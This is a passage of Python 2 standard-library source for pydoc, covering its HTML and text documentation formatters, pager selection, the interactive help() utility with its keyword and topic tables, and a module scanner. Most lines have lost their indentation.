note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
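    # For example: bold('hi') returns 'h\bhi\bi'; pagers render the
    # overstruck characters as bold, and plain() below strips them again.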
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name),
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0]),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
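# For example: plain('h\bhi\bi') -> 'hi', undoing the overstriking produced
# by TextDoc.bold().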
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
        r = inc = int(os.environ.get('LINES', 25)) - 1  # LINES is a string when set in the environment
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
                sys.stdout.write('\r          \r')
break
elif c in ('\r', '\n'):
                sys.stdout.write('\r          \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
for part in parts[n:]:
try: object = getattr(object, part)
except AttributeError: return None
return object
else:
if hasattr(__builtin__, path):
return getattr(__builtin__, path)
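# For example: locate('os.path.join') imports os.path and returns the join
# function; locate('no.such.thing') returns None once the import walk fails.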
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
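# For example: doc('os.path.join') resolves the dotted path and pages
# "Python Library Documentation: function join in os.path"; doc(len)
# documents the object that is passed in directly.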
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
